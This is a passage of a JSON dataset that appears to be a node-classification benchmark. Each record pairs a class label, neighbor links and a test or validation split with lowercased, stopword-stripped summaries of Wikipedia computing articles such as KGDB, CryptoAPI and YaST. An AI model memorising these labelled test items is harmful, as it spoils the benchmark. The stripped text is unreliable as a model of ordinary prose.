      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      3898,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9190,
    "label": 3,
    "text": "KGDB:kgdb kgdb debugger linux kernel kernels netbsd freebsd requires two machines connected via serial connection serial connection may either rs-232 interface using null modem cable via udp/ip networking protocol kgdb ethernet kgdboe target machine one debugged runs patched kernel host machine runs gdb gdb remote protocol used two machines kgdb implemented part netbsd kernel 1997 freebsd version 2.2 concept existing remote gdb protocol later adapted patch linux kernel scaled-down version linux patch integrated official linux kernel version 2.6.26 kgdb available following architectures linux x86 x86-64 powerpc arm mips s390 available supported architectures netbsd freebsd using rs-232 connectivity amit kale maintained linux kgdb 2000 2004 2004 2006 maintained linsyssoft technologies jason wessel wind river systems inc. took official maintainer ingo molnar jason wessel created slimmed-down cleaned version kgdb called kgdb light without ethernet support many hacks one merged 2.6.26 kernel version kgdb supports rs-232 connectivity using special driver split debugger inputs console inputs single serial port required program named kgdb also used freebsd gdb based utility debugging kernel core files also used remote live kernel debugging much way linux kgdb either serial connection firewire link",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      4493,
      2195,
      11155,
      1813,
      11413,
      10780,
      1694,
      9374,
      3618,
      4011,
      9646,
      7983,
      823,
      9660,
      10817,
      7234,
      5067,
      8147,
      1761,
      4841,
      5356,
      9964,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9191,
    "label": 3,
    "text": "Cyberun:cyberun cyberun zx spectrum video game ostensibly developed ultimate play game published u.s. gold 1986 although part jetman series similarities jetpac player must construct spaceship parts seek resources power-ups unlike ultimate titles cyberun written partnership tim chris stamper player controls spaceship trapped planet inhabited hostile aliens goal upgrade spaceship parts scattered around planet mine valuable element called cybernite atmosphere ground populated flying aliens clouds drip acid damaging ship shields ship requires fuel fly exhausted bounce along ground planet unable climb similar enemy ship also planet attempting mine cybernite player fuel replenished tankers planet surface damaged shields repaired player must venture caverns surface order mine cybernite done ship upgraded include mining laser sufficient cybernite collected player escape next planet zebarema system game well received critics crash awarding 90 crash smash spectrum giving 8/10 describing game classic pick pieces shoot em brilliant graphics link playing online",
    "neighbors": [
      320,
      4102,
      9254,
      2792,
      9006,
      4278,
      5820,
      2173
    ],
    "mask": "Test"
  },
  {
    "node_id": 9192,
    "label": 9,
    "text": "MetaPost:metapost metapost refers programming language interpreter metapost programming language derived donald knuth metafont language interpreter metapost produces vector graphic diagrams geometric/algebraic description language shares metafont declarative syntax manipulating lines curves points geometric transformations however many limitations metapost derive features metafont instance metapost support features postscript notably paths one segment regions simply connected regions filled uniform colours postscript level 1 supports tiled patterns postscript 3 supports gouraud shading metapost distributed many distributions tex metafont framework example included miktex tex live distributions encapsulated postscript produced metapost included latex context tex documents via standard graphics inclusion commands encapsulated postscript output also used pdftex engine thus directly giving pdf ability implemented context latex graphics package used plain tex via supp-pdf.tex macro file context luatex supports inclusion metapost code within input file inclusion metapost code latex also possible using latex-packages example gmp mpgraphics single file samp example.mp /samp processed metapost interpreter via command codice_1 linux produces three eps files samp example.1 /samp samp example.2 /samp samp example.3 /samp pictured right resulting three eps files used tex via latex codice_2 command context codice_3 plain tex codice_4 command plain pdftex codice_5 command samp supp-pdf.tex /samp view print third diagram inclusion necessary tex fonts computer modern included eps files produced metapost default",
    "neighbors": [
      9345,
      2978,
      1347,
      3876,
      9827,
      8262,
      1191,
      9320,
      73,
      6553,
      5612,
      2798,
      7983,
      10352,
      8628,
      823,
      345
    ],
    "mask": "None"
  },
  {
    "node_id": 9193,
    "label": 8,
    "text": "CGIProxy:cgiproxy cgiproxy name suggests cgi proxy software package cgi common gateway interface proxy appears user web page allows user access different site cases anonymously anonymous cgi proxy type proxy server works encrypted web form embedded another web page hosted securely using ssl secure socket layering also often called web proxy cgiproxy written perl programming language installed web server execute perl program via cgi supports non-parsed header cgi scripts addition installed mod_perl fastcgi script standalone daemon supported protocols include http ftp ssl well related technologies javascript adobe flash cgiproxy development stalled december 25 2008 december 9 2011 later saw six releases 2014 quite extensive changelog including windows support though nature perl language practically requires source code cgiproxy visible install cgiproxy technically open source software due commercial license fee however extensively commented modularized designed start encourage users modify extend purposes author licenses used freely non-commercial use negotiate license terms commercial use",
    "neighbors": [
      4224,
      3462,
      5254,
      8582,
      138,
      1692,
      9117,
      3625,
      2485,
      8630,
      8640,
      3777,
      2884,
      3781,
      7364,
      225,
      2661,
      10341,
      4725,
      5749,
      119,
      5887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9194,
    "label": 2,
    "text": "MS-Net:ms-net ms-net sometimes stylized ms-net early network operating system sold microsoft earliest days local area networking lans ms-net complete networking system microsoft licensed vendors used basis server programs ran ms-dos porting underlying networking hardware adding services top version 1.0 announced 14 august 1984 released along pc/at 2 april 1985 number ms-net products sold late 1980s replaced lan manager 1990 ms-net network interface based ibm netbios protocol definition allowed ported different networking systems relative ease implement entire netbios protocol however small number features required server role one key feature implemented netbios name management routines feature 3rd parties often added back system also supplied program redir.exe allowed transparent file access dos machines ms-net based server several products mid-to-late-1980s based ms-net system ibm pc-net slightly modified version ms-net system typically used token ring ms partnered 3com produce widely used 3+share system running 3com networking stack based xns protocol ethernet well-known systems including banyan vines novell netware use ms-net basis using unix custom os respectively however allow access files via redir.exe ms-net sold short period time ms 3com collaborated replacement known lan manager running os/2 using new server message block standard file transfer 3com version product retained xns-based protocol 3com abandoned server market long ms version remained based netbios supported number underlying protocols hardware lan manager replaced 1993 windows nt 3.1",
    "neighbors": [
      8576,
      6787,
      6797,
      8976,
      3857,
      3477,
      5406,
      10273,
      8098,
      7983,
      570,
      7483,
      3007,
      321,
      6596,
      8262,
      9033,
      5067,
      2380,
      6476,
      9166,
      4305,
      4051,
      5600,
      8423,
      8301,
      499,
      5363,
      5492,
      3323,
      1148,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 9195,
    "label": 9,
    "text": "Douglas_Crockford:douglas crockford douglas crockford american computer programmer entrepreneur best known ongoing involvement development javascript language popularized data format json javascript object notation developing various javascript related tools jslint jsmin currently senior javascript architect paypal also writer speaker javascript json related web technologies crockford earned degree radio television san francisco state university 1975 took classes fortran worked university lab computer crockford purchased atari 8-bit computer 1980 wrote game galahad holy grail atari program exchange apx resulted chris crawford hiring atari inc atari crockford wrote another game burgers apx number experimental audio/visual demos freely distributed warner communications sold company joined national semiconductor 1984 crockford joined lucasfilm later paramount pictures became known video game oriented listservs early 1990s posted memoir expurgation maniac mansion videogaming bulletin board memoir documented efforts censor computer game maniac mansion nintendo satisfaction could release cartridge crockford mounting frustrations nintendo demands became obscure confusing together randy farmer chip morningstar crockford founded electric communities ceo 1994 1995 involved development programming language e. crockford founder state software also known veil networks cto 2001 2002 time state software crockford popularized json data format based upon existing javascript language constructs lightweight alternative xml obtained domain name json.org 2002 put description format july 2006 specified format officially rfc 4627 2002 reference president george bush war evildoers crockford started releasing jsmin software custom license created adding requirement software shall used good evil open source mit license clause carried jsmin-php variation jsmin ryan grove software hosted google code december 2009 due additional clause google determined license compliant definition free open source software permit restriction software may used jsmin-php forced migrate new hosting provider",
    "neighbors": [
      256,
      1409,
      259,
      8068,
      3462,
      6791,
      1802,
      6154,
      10507,
      8854,
      4378,
      8605,
      7455,
      6176,
      1698,
      803,
      5031,
      3761,
      1203,
      11060,
      438,
      4920,
      1470,
      5311,
      2880,
      65,
      7871,
      9152,
      4171,
      5067,
      11087,
      339,
      84,
      4056,
      9560,
      9561,
      603,
      8923,
      479,
      8289,
      482,
      5219,
      7396,
      487,
      5483,
      5101,
      9454,
      10991,
      10097,
      10739,
      10744,
      3323,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 9196,
    "label": 2,
    "text": "Microsoft_CryptoAPI:microsoft cryptoapi microsoft windows platform specific cryptographic application programming interface also known variously cryptoapi microsoft cryptography api ms-capi simply capi application programming interface included microsoft windows operating systems provides services enable developers secure windows-based applications using cryptography set dynamically linked libraries provides abstraction layer isolates programmers code used encrypt data crypto api first introduced windows nt 4.0 enhanced subsequent versions cryptoapi supports public-key symmetric key cryptography though persistent symmetric keys supported includes functionality encrypting decrypting data authentication using digital certificates also includes cryptographically secure pseudorandom number generator function cryptgenrandom cryptoapi works number csps cryptographic service providers installed machine csps modules actual work encoding decoding data performing cryptographic functions vendors hsms may supply csp works hardware windows vista features update crypto api known cryptography api next generation cng better api factoring allow functions work using wide range cryptographic algorithms includes number newer algorithms part national security agency nsa suite b also flexible featuring support plugging custom cryptographic apis cng runtime however cng key storage providers still support symmetric keys cng works user kernel mode also supports algorithms cryptoapi microsoft provider implements cng housed bcrypt.dll cng also supports elliptic curve cryptography uses shorter keys expected level security efficient rsa cng api integrates smart card subsystem including base smart card cryptographic service provider base csp module encapsulates smart card api smart card manufacturers make devices compatible rather provide from-scratch solution cng also adds support dual_ec_drbg pseudorandom number generator defined nist sp 800-90a could expose user eavesdropping national security agency since contains kleptographic backdoor unless developer remembers generate new base points different cryptographically secure pseudorandom number generator true random number generator publish generated seed order remove nsa backdoor also slow used called explicitly cng also replaces default prng ctr_drbg using aes block cipher earlier rng defined superseded fips 186-2 based either des sha-1 broken ctr_drbg one two algorithms nist sp 800-90 endorsed schneier hash_drbg",
    "neighbors": [
      10243,
      9745,
      9234,
      1043,
      10769,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      1098,
      4174,
      4178,
      7252,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      1676,
      653,
      6797,
      3224,
      4771,
      7846,
      2221,
      10414,
      3250,
      8391,
      7887,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6403,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      1315,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5433,
      5952,
      1348,
      9541,
      844,
      10079,
      11616,
      8040,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11678,
      11683,
      6584,
      2493,
      7629,
      4063,
      8161,
      6114,
      8674,
      2027,
      4590,
      11247,
      3573,
      10229,
      5117,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 9197,
    "label": 2,
    "text": "YaST:yast yast yet another setup tool linux operating system setup configuration tool yast featured opensuse linux distribution well suse derived commercial distributions also part defunct united linux yast features tools configure many aspects system first suse distribution included yast released may 1996 yast re-written 1999 included first suse linux 6.3 installer yast2 added desktop suse linux 6.4 co-existed yast1 yast1 removal suse linux 8.0 yast free software suse made available gpl 2004 tool administering maintaining suse linux installation allows administrators install software configure hardware set networks servers feature yast contains graphical user interface gui text-based user interface tui ncurses front ends especially useful non-gui installations servers system administration slow internet connections one unable boot graphical x server still requires advanced user interface package manager example novice user trying downgrade xorg package fix graphical installation yast offers package management functionality zypp project first zypp enabled package management yast applications performance problems long start times improved 10.2 10.3 releases starting opensuse 11.0 alpha 3 zypp integrated sat solver project making yast zypper faster rpm based package managers yast used include sax sax2 suse advanced x configuration sax re-written sax2 suse linux 6.4 sax1 removed suse linux 8.1 sax2 removed yast control center opensuse 11.2 sax2 removed completely opensuse 11.3 gtk interface removed opensuse leap 42.1 yast often receives updates improvements tumbleweed versions leap opensuse leap 15.1 example saw improvements yast interface managing firewalls including addition interface command line version yast release opensuse leap yast updated logo improved partition management module yast implemented ruby programming language autoyast system installing one opensuse systems automatically without user intervention autoyast installations performed using control file installation configuration data profile current system stored codice_1 webyast web interface yast used check status current machine check installation packages shutdown reboot system change system settings time change status system services daemons change license yast previous rather restrictive license gpl 2004 made possible port yast gnu/linux distributions consequence project yast4debian launched worked port yast debian project contact yast team novell/suse reached important milestones port modules yast2-ncurses yast2-qt currently project dormant searching new voluntary project maintainer",
    "neighbors": [
      4961,
      9030,
      5000,
      4841,
      1741,
      3791,
      7983,
      10096,
      1522,
      4309,
      823,
      9245
    ],
    "mask": "None"
  },
  {
    "node_id": 9198,
    "label": 2,
    "text": "Galcon:galcon galcon series real-time strategy video games android iphone webos windows linux mac os x flash developed phil hassey set space involves maneuvering fleets ships capture enemy planets original 1987 galactic conquest rick raddatz shareware title pc multiplayer conquest game similar board game risk based game called stellar invasion bearbyte software galcon classic released desktop late 2006 ludum dare timed game development contest developed advanced video game galcon classic features dozens single-player game modes full multiplayer july 2008 galcon publicly released instantaction web browser game platform released garagegames first time galcon released campaign sort gameplay couple months later galcon released iphone frequently called igalcon fans igalcon one first true multiplayer experiences iphone never gained enough publicity kick igalcon comes multiple single-player modes featuring varying degrees bot difficulty advanced online multiplayer system players battle rooms four june 2009 galcon flash released galcon flash flash port galcon closely resembled iphone port although galcon flash given small introductory price number registered users small however limited demo version galcon labs released early october 2009 galcon labs sequel first igalcon galcon labs features four new modes singleplayer multiplayer compatible galcon labs received positive addition galcon series february 11 2010 galcon fusion released mac windows latest addition galcon family desktop tablet equivalent galcon labs original galcon kick-starter galcon 2 launched december 7 2012 successfully funded released ios february 6 2014 players start 1-3 large home planets send ships conquer planets around numbers planet indicate many ships take conquer numbers player planet indicate number ships planet holds planet player owns produces ships player ships faster rate produced depending planet size players select percentage ships send planet players redirect ships mid-flight aim game defeat player eliminating enemy planets galcon 2 uses ranking system based upon elo rating system galcon classic received good reviews multiple awards iphone galcons received excellent reviews smaller publicity angle instantaction version given public reviews overall rating high galcon flash also receive many reviews mostly failed popularity igalcon macworld gave game 4 stars praising game entertaining online play felt single player levels progress evenly easy hard cases pocketgamer gave game 8 10 commenting 'innovative space game simple controls deep strategy slide play gave game 3 good 4 saying extremely satisfying online play made good game fall 2010 galcon used google ai challenge basis contest problem contest participants wrote programs competed simplified version game another modern game implementing idea behind galactic conquest foss game gnulactic konquest kdegames package solarmax series also based upon concept 2018 multiple clones galcon available mobile platforms",
    "neighbors": [
      9732,
      6797,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9199,
    "label": 4,
    "text": "Scottish_National_Entitlement_Card:scottish national entitlement card scottish national entitlement card nec scotland-wide smart card scheme run scottish local authorities behalf scottish government predominantly operated concessionary travel pass also act proof age young people young scot nec give access civic services libraries leisure centres depending local authority 2000 scottish executive assigned budget modernising government fund intended improve public services part budget targeted towards development voluntary public sector smartcard initiative 2003 highlighted area developed local authorities parallel s.40 transport scotland act 2005 provided introduction national travel concession schemes would funded centrally rather local authorities decided known national entitlement card would used administer travel scheme introduced 2006 parallel development local authority administered citizen account modernising government fund 2006 articulated need assign records unique citizen reference number ucrn envisaged associating account nationally compatible smart cards service access tokens ucrn maintained part scotland national health service central register nhscr data access subset register scottish local authorities enabled s.57 local electoral administration registration services scotland act 2006 lears act scot nhscr assigned unique citizen reference number ucrn local authorities access certain conditions ucrn may linked nhscr data used verification purposes proposed expansion use 2014 raised fears ucrn form backbone scottish identity register persistent identification individuals across scottish state datasets open rights group accused proposal creating national id system backdoor despite scottish government opposition uk previous identity cards scheme february 2017 announced proposed expansion go ahead scottish nec allows scottish residents certain disabilities aged 60 years old access free travel within scotland nearly local bus scheduled long distance coach services including morning rush hour excluding premium fare night buses city sightseeing buses travel also valid bus services start/terminate carlisle berwick upon tweed long service travels to/from scotland entitlement free bus travel nec dependent scottish resident least 5 years old meeting one following criteria main cardholder meets following criteria also entitled companion travel usually attracting discount main cardholder get national entitlement card must discounted bus rail travel within scotland made available scottish residents aged 16-18 years old full-time volunteers aged 19 26 years old via young scot nec residents western isles orkney shetland also receive two free return ferry trips scottish mainland receive free bus travel young scot travel discount areas scotland additional concessionary travel options available example nec issued residing strathclyde partnership transport spt area gives access additional rail glasgow subway concessions young scot national youth information citizenship charity supported scottish government 11-26 year olds scotland young people age scotland eligible receive young scot national entitlement card young scot nec issued proof age standards scheme therefore used young person access age-restricted goods services addition travel concessions young people eligible card also entitles holder number services discounts young scot provide nec used number different additional purposes since introduction common uses include access cashless catering schools means providing library leisure membership discounted admissions basis age disability local authority areas card may used national purposes outlined local authorities normally issue nec valid application service using nec received",
    "neighbors": [
      9483,
      5868,
      9199
    ],
    "mask": "None"
  },
  {
    "node_id": 9200,
    "label": 0,
    "text": "Collostructional_analysis:collostructional analysis collostructional analysis family methods developed alphabetical order stefan th gries university california santa barbara anatol stefanowitsch free university berlin collostructional analysis aims measuring degree attraction repulsion words exhibit constructions notion construction far goldberg construction grammar collostructional analysis far comprises three different methods collostructional analysis requires frequencies words constructions similar wide variety collocation statistics differs raw frequency counts providing observed co-occurrence frequencies words constructions also comparison observed frequency one expected chance thus collostructional analysis distinguish attraction repulsion words constructions ii measure strength attraction repulsion usually log-transformed p-value fisher-yates exact test collostructional analysis differs collocation statistics measures association words words words syntactic patterns constructions thus takes syntactic structure seriously collocation-based analyses ii far used precise statistics namely fisher-yates exact test based hypergeometric distribution thus unlike -scores z -scores chi-square tests etc. analysis based violate distributional assumptions",
    "neighbors": [
      1890,
      5122
    ],
    "mask": "None"
  },
  {
    "node_id": 9201,
    "label": 2,
    "text": "FreeBSD_Core_Team:freebsd core team freebsd core team would equivalent board directors freebsd project company freebsd project run freebsd committers developers svn commit access core team exists provide direction responsible setting goals freebsd project provide mediation event disputes also takes final decision case disagreement individuals teams involved project core team also responsible selecting individuals teams related development ongoing maintenance freebsd security officer release engineering team port manager team finally core team also vote nominations new committers event breach internal rules conduct falls core team decide sanctions freebsd core team equivalent similar body netbsd project called core group freebsd core team began unofficial group programmers mainly consisting initiated freebsd project eleven members new members could join invitation freebsd project grew core team year 2000 200 active committers core team expanded 18 people core members completely inactive others far less active many non-members even accusations cronyism old informal structure longer considered viable early 2000 discussions regarding future organisation set bylaws formulated jonathan lemon warner losh wes peters general vote active committers august 28 2000 bylaws passed 117 votes 5 freebsd core team elected body comprising nine members pool project developers rights directly change project repositories committers committers entitled vote core elections made least one change one project repositories past 12 months first election took place september 2000 seventeen candidates stood election including eight existing core team five re-elected alongside four new members elections taken place every two years since recent election results announced july 4 2018 elections shall held two years last vote even previous election early elections may held early membership core team fall seven petitioned 1/3 active developers bylaws may changed 2/3 majority committers least 50 active committers participate vote core team appoints secretary discretion non-voting position exists provide central point contact external parties group keeping track agenda acting interface core internal groups account creation team core team secretary also responsible writing distributing monthly status reports freebsd developer community current core team secretary joseph mingrone election lasts five weeks first week committers wish run election announce intention four weeks follow application period active committers vote nine candidates voting period closes votes counted ties resolved unambiguously elected candidates instance tie ninth place first eight decide tied candidates join team results announced within one week end voting period newly elected team enters office one week announcement",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      9009,
      11698,
      11573,
      1718,
      4919,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      998,
      4073,
      8816,
      2545,
      3058,
      7027,
      9844,
      2421,
      11506,
      2424,
      1273,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 9202,
    "label": 8,
    "text": "ServerCentral:servercentral servercentral turing group infrastructure provider colocation cloud infrastructure iaas draas network connectivity managed storage managed services data centers across north america europe australia asia company customers include cdw outbrain new relic ars technica cars.com shopify 2018 servercentral named one fastest-growing private companies united states inc. magazine eighth consecutive year jordan lowe daniel brosk began hosting services friends local businesses virtual private servers growing 10,000 accounts growth spiked lowe brosk began advertising free domain names exchange prepaid hosting accounts daily deal website team switched manual billing account creation processes lifecycle hosting automation solution swsoft automated full customer lifecycle 2002 servercentral headquarters server operations moved chicago il 2003 servercentral opened data centers ashburn virginia san jose california servercentral private 10-gigabit ip network connected data centers year servercentral sponsored services php.net open-source community development php scripting 2004 servercentral expanded tokyo 2005 servercentral rebranded web hosting division wingsix 2008 sold uk2 group order concentrate managed data center infrastructure servercentral expanded amsterdam began collaboration cachefly high-speed content delivery network cdn 2006 servercentral one first large-scale networks deploy native ipv6 traffic 2009 servercentral expanded data center footprint elk grove village illinois signing long-term leasing agreement dupont fabros technology dft dft environmentally conscious design includes battery-free ups systems advanced mechanical automation high voltage throughout power distribution system may 2009 server operations opened new elk grove village il facility servercentral successfully completed sas 70 type ii audit singlehop signed 2.7 million agreement colocation space support servercentral elk grove data center singlehop signed 5-year 7-million contract servercentral april 2011 approximately 80 cabinets servercentral expanded three times within dft 2009 2012 bringing total elk grove footprint approximately 40,000 square feet 5.5 megawatts critical load 2010 servercentral introduced dedicated private cloud dpc single-tenant infrastructure tuned enterprise setup servercentral expanded within elk grove village il facility made inc. magazine list fastest-growing private companies america 2011 servercentral 58 employees 21.2 million revenue 13 annual growth june 2012 servercentral launched servercentral enterprise cloud public iaas servercentral completed type 2 ssae 16 soc 1 audit climbed inc. magazine list fastest-growing private companies america 2012 servercentral expanded 40,000 square feet 5.5 megawatts critical load elk grove village il 2013 brill street company named servercentral top 50 employer emerging gen talent chicago 2014 servercentral announced ddos mitigation radware servercentral also made inc. magazine honor roll named inc. 5000 fastest-growing private companies america fifth consecutive year 2015 servercentral expanded cloud portfolio multi-tenant managed vmware 2018 servercentral acquired turing group became known servercentral turing group sctg servercentral turing group operates twelve data centers across ten locations equipment space bandwidth add-on support rented retail customers 2019 servercentral turing group soc 2 type ii audited company pci-dss compliant managed services include dedicated servers data center migrations switch router maintenance vmware storage high-availability load balancers backup recovery remote hands firewalls application service infrastructure monitoring servercentral turing group provides backup replication single multi-site disaster recovery service servercentral turing group cloud computing services private shared hybrid iaas platforms colocation customers directly connect third-party public cloud providers servercentral turing group also provides aws cloud consulting services certified aws msp partner servercentral turing group network services include private ip transit dedicated data transport optical fiber managed network stacks native dual-stack ipv4 ipv6 service servercentral turing group operates 10-gigabit mpls backbone high-capacity bandwidth interconnectivity global data center locations servercentral turing group deployed native ipv6 traffic private network since 2006 servercentral turing group ranked among top service aws consulting companies clutch.co 2019 servercentral named top cloud consultant managed service provider clutch.co 2017 servercentral received award chicago best brightest companies work 2015 2016 servercentral ranked crn fast growth 150 list annual ranking fastest-growing solution providers north america 2011 2015 february 2015 servercentral made crn hosting msp 100 list recognizing american managed service providers operate data centers offer innovative subscription-based managed services servercentral held a+ rating better business bureau outstanding customer service since 2001 servercentral named inc. magazine list fastest-growing companies america 2010 2011 2012 2013 2014 2015 2016 2017 servercentral named one brill street company top employers gen talent 2013 servercentral received web host magazine editor choice award “ one solid networks industry. ” review included accolades company support team hardware quality pricing",
    "neighbors": [
      4194,
      8644,
      6565,
      3366,
      8998,
      6153,
      11097,
      2842,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 9203,
    "label": 4,
    "text": "UpGuard:upguard upguard inc. australian cybersecurity startup company founded alan sharp-paul leo venegas mike baukes presently based mountain view california upguard provides products services help companies stand securely configured systems guard outages breaches 2016 company raised 17m series b funding round 2018 company employs around 46 upguard cyber resilience platform determines company cyber-security risk factors scanning internal external computer systems platform automatically scans every server application network mobile devices environments create living model configuration state thereafter continually assessing system record security vulnerabilities configuration drift procedural changes model platform dynamically derives unified cyber-security risk score cstar determines cyber risk posture assets multivariate factors upguard formerly scriptrock australian security company offices mountain view california sydney australia working investment firm colonial first state company founders leo venegas alan sharp-paul mike baukes met on-the-job sydney australia sharp-paul web developer baukes systems administrator spending years financial services australia uk trio developed system corporations understand business software portfolios consequent risk breaches outages due poor configuration management first release system initially named guardrail allowed automation typical cybersecurity devops practices focusing deep analysis relevant servers software applications settings 2016 company raised 17m series b funding round co-led pellion included august capital square peg capital insurance australia group early 2017 upguard signed exclusive distribution partnership aca pacific order establish stronger presence apac region baukes sharp-paul opened upguard office sydney australia bringing company back region began june 2017 upguard announced found unsecured server containing data deep root analytics contained information almost 200 million american voters upguard helps companies stand securely configured systems guard outages breaches product uses resilience supervisor integrates checks every step technology lifecycle whilst continuously assessing risk factors misconfiguration configuration drift process vulnerabilities approach unique platforms architecture allows dynamic capture large configuration datasets continuously order difference visualize report potential breaches outages proactively products core configuration information transformed security policies procedural validations automations ensure desired integrity environments maintained auditable enhanced identifying authorized change vs unauthorised change dynamically reconciling entire environments ticketing systems itsm processes sdlc processes upguard summarizes key insights across data dynamically includes proprietary risk modeling method called cstar aggregates relevant risk factors score 0-950 similar credit score allowing companies effectively predict prioritize high-risk impact areas track risk hotspots time compare scores similar companies like industries comparison upguard ships three products interoperate form deployable cyber resilience strategy discover control predict aims address different source risk related information technology",
    "neighbors": [
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9204,
    "label": 6,
    "text": "Du_(Unix):du unix codice_1 abbreviated disk usage standard unix program used estimate file space usage—space used particular directory files file system codice_1 utility first appeared version 1 unix version codice_1 bundled gnu coreutils written torbjorn granlund david mackenzie paul eggert jim meyering default single unix specification sus specifies codice_1 display file space allocated file directory contained current directory links displayed size link file linked size content directories displayed expected codice_1 reports allocation space absolute file space amount space file system shown codice_1 may vary shown codice_7 files deleted blocks yet freed also minfree setting allocates datablocks filesystem super user processes creates discrepancy total blocks sum used available blocks minfree setting usually set 5 total filesystem size info see core utils faq codice_1 takes single argument specifying pathname du work specified current directory used sus mandates du following options unix unix-like operating systems may add extra options example bsd gnu codice_1 specify -h option displaying disk usage format easier read user adding units appropriate si prefix e.g 10 mb sum directories -s kilobytes -k sum directories -s human-readable format -h byte kilobyte megabyte gigabyte terabyte petabyte disk usage subdirectories files including hidden files within current directory sorted filesize disk usage subdirectories files including hidden files within current directory sorted reverse filesize weight size subdirectory current directory -d 1 sum total end -c displayed human-readable format -h du gnu weight size subdirectories root directory -d 1 trailing sum total end -c displayed human-readable format -h without traversing filesystems -x useful /var /tmp directories separate storage root directory du gnu",
    "neighbors": [
      2432,
      515,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      8975,
      11663,
      4369,
      5397,
      2198,
      6812,
      7196,
      4001,
      6138,
      9762,
      2599,
      7847,
      10025,
      8236,
      4398,
      7983,
      1844,
      823,
      1336,
      8504,
      7356,
      3522,
      451,
      1987,
      965,
      2245,
      8517,
      9542,
      5706,
      3659,
      8522,
      1741,
      10967,
      9946,
      6369,
      8675,
      10727,
      6120,
      491,
      8954,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      10484,
      506,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 9205,
    "label": 1,
    "text": "SQL_Server_Express:sql server express microsoft sql server express version microsoft sql server relational database management system free download distribute use comprises database specifically targeted embedded smaller-scale applications product traces roots microsoft database engine msde product shipped sql server 2000 express branding used since release sql server 2005 sql server express provides many features paid full versions microsoft sql server database management system however technical restrictions make unsuitable large-scale deployments differences express product include unlike predecessor product msde express product include concurrent workload-governor limit performance database engine receives work typical small number users sql server express includes several gui tools database management include predecessor product msde generally lacked basic gui management tools features available sql server standard better editions absent sql server express include microsoft makes sql server express available free 2005 express version example standard approach installation options provided follows generally sql 2005 express installers packaged following consistent naming convention optional variants gone several service packs sp sp installer used without using older ones first",
    "neighbors": [
      5380,
      6797,
      10900,
      10389,
      10902,
      11030,
      3224,
      5401,
      7064,
      11414,
      4384,
      8227,
      11683,
      11559,
      4010,
      5546,
      10157,
      10286,
      7983,
      9263,
      11570,
      6709,
      8246,
      823,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      9434,
      603,
      7134,
      608,
      2401,
      8161,
      7523,
      3303,
      11498,
      3821,
      10991,
      3573,
      5754,
      2045,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 9206,
    "label": 5,
    "text": "Unidirectional_Link_Detection:unidirectional link detection unidirectional link detection udld data link layer protocol cisco systems monitor physical configuration cables detect unidirectional links udld complements spanning tree protocol used eliminate switching loops two devices b connected via pair optical fibers one used sending b sending b link bidirectional two-way one fibers broken link become one-way unidirectional goal udld protocol detect broken bidirectional link e.g transmitted packets arrive receiver fibers connected different ports device port udld packet sent port links packet contains sender identity information device port expected receiver identity information device port port checks udld packets receives contain identifiers device port udld cisco-proprietary protocol hp extreme networks avaya similar feature calling different name hp calls device link detection protocol dldp extreme networks call extreme link status monitoring elsm avaya calls link-state tracking similar functionality standardized form provided part ethernet oam protocol defined part ethernet first mile changes 802.3 previously 802.3ah d-link duld feature built top ethernet oam function brocade devices running ironware support proprietary form udld use udld 10gbe augmented per 802.3ae/d3.2 standard fault detected physical link",
    "neighbors": [
      6834,
      7865,
      2426
    ],
    "mask": "Test"
  },
  {
    "node_id": 9207,
    "label": 5,
    "text": "OMA_Instant_Messaging_and_Presence_Service:oma instant messaging presence service oma instant messaging presence service imps open mobile alliance enabler instant messaging presence wireless village consortium developed first cut specifications wireless village merged oma specs became oma imps 1.0 specifications imps widely deployed necessarily marketed interworking several operators imps platforms performed gsma initiative encourages interworking deployment instant messaging vanilla terminals often imps clients nokia chat client accessed via presence menu sony ericsson called friends motorola called im phones chat clients generally designed provider neutral put wireless village server settings phone n't inbuilt chat client might still able get third-party chat application runs phone symbian java brew application environment need get chat client wireless village compliant presence-enabled note still necessary operator provide im service and/or one connect third party server connection others im'ing partial list",
    "neighbors": [
      7396,
      1285,
      11240,
      3561,
      5875,
      1695
    ],
    "mask": "None"
  },
  {
    "node_id": 9208,
    "label": 9,
